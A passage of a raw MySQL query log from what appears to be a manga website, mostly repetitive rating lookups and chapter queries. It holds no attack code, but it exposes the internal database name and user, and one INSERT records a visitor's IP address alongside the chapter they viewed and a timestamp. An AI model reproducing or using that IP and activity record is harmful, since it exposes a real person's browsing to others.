total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330656097 Quit 330656098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330656098 Quit 330656099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330656099 Quit 330656100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330656100 Quit 330656101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330656101 Quit 330656102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330656102 Quit 330656103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330656103 Quit 330656104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330656104 Quit 330656105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330656105 Quit 330656106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330656106 Quit 330656107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330656107 Quit 330656108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330656108 Quit 330656109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330656109 Quit 330656110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330656110 Quit 330656111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330656111 Quit 330656112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330656112 Quit 330656113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330656113 Quit 330656114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330656114 Quit 330656115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330656115 Quit 330656116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330656116 Quit 330656117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330656117 Quit 330656118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330656118 Quit 330656119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330656119 Quit 330656120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330656120 Quit 330656121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330656121 Quit 330656122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330656122 Quit 330656123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330656123 Quit 330656124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330656124 Quit 330656125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330656125 Quit 330656126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330656126 Quit 330656127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330656127 Quit 330656128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330656128 Quit 330656129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330656129 Quit 330656130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330656130 Quit 330656131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330656131 Quit 330656132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330656132 Quit 330656133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330656133 Quit 330656134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330656134 Quit 330656135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330656135 Quit 330656136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330656136 Quit 330656137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330656137 Quit 330656138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330656138 Quit 330656139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330656139 Quit 330656140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330656140 Quit 330656141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330656141 Quit 330656142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330656142 Quit 330656143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330656143 Quit 330656144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330656144 Quit 330656145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330656145 Quit 330656146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330656146 Quit 330656147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330656147 Quit 330656148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330656148 Quit 330656149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330656149 Quit 330656150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330656150 Quit 330656151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330656151 Quit 330656152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330656152 Quit 330656153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330656153 Quit 330656154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330656154 Quit 330656155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330656155 Quit 330656156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330656156 Quit 330656157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330656157 Quit 330656158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330656158 Quit 330656159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330656160 Quit 330656161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656159 Quit 330656161 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15678' 330656162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330656162 Quit 330656163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656161 Quit 330656163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330656163 Quit 330656164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656164 Query select * FROM chapters where id = '15678' 330656165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330656164 Quit 330656165 Quit 330656166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656166 Query select * FROM chapters where manga_id = '318' order by id desc 330656167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330656167 Quit 330656168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330656168 Quit 330656169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330656169 Quit 330656170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330656170 Quit 330656171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330656171 Quit 330656172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330656172 Quit 330656173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330656173 Quit 330656174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330656174 Quit 330656175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330656175 Quit 330656176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330656176 Quit 330656177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330656177 Quit 330656178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330656178 Quit 330656179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330656179 Quit 330656180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330656180 Quit 330656181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330656181 Quit 330656182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330656182 Quit 330656183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330656183 Quit 330656184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330656184 Quit 330656185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330656185 Quit 330656186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330656186 Quit 330656166 Quit 330656187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656187 Query Update chapters set view=view+1 where id = '15678' 330656188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330656188 Quit 330656189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330656189 Quit 330656190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330656190 Quit 330656187 Quit 330656191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330656192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656192 Query select * FROM chapters where id = '15678' 330656191 Quit 330656193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330656193 Quit 330656192 Quit 330656194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656194 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15678' 330656195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330656195 Quit 330656194 Quit 330656196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330656196 Quit 330656197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656197 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('318', '15678', '142.181.129.106', 'mangacherri.com', '2026-02-26 03:29:44', '2026-02-26 03:29:44') 330656198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330656198 Quit 330656199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656197 Quit 330656199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330656200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656199 Quit 330656200 Query select * FROM chapter_images where chapter_id = '15678' 330656201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656200 Quit 330656201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330656201 Quit 330656202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656202 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '318' and m.active = 1 330656203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330656203 Quit 330656204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330656204 Quit 330656205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330656205 Quit 330656206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330656206 Quit 330656207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330656207 Quit 330656208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330656208 Quit 330656209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330656209 Quit 330656210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330656210 Quit 330656211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330656211 Quit 330656212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330656212 Quit 330656213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330656213 Quit 330656214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330656214 Quit 330656215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330656216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656216 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='318' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330656202 Quit 330656215 Quit 330656217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330656217 Quit 330656218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330656218 Quit 330656219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330656219 Quit 330656220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330656220 Quit 330656221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330656221 Quit 330656222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330656222 Quit 330656223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330656223 Quit 330656224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330656224 Quit 330656225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330656225 Quit 330656226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330656226 Quit 330656227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330656227 Quit 330656228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330656228 Quit 330656229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330656229 Quit 330656230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330656230 Quit 330656231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330656231 Quit 330656232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330656232 Quit 330656233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330656233 Quit 330656234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330656234 Quit 330656235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330656235 Quit 330656236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330656236 Quit 330656237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330656237 Quit 330656238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330656238 Quit 330656239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330656239 Quit 330656240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330656240 Quit 330656241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330656241 Quit 330656242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330656242 Quit 330656243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330656243 Quit 330656244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330656244 Quit 330656245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330656245 Quit 330656246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330656246 Quit 330656247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330656247 Quit 330656248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330656248 Quit 330656249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330656249 Quit 330656250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330656250 Quit 330656251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 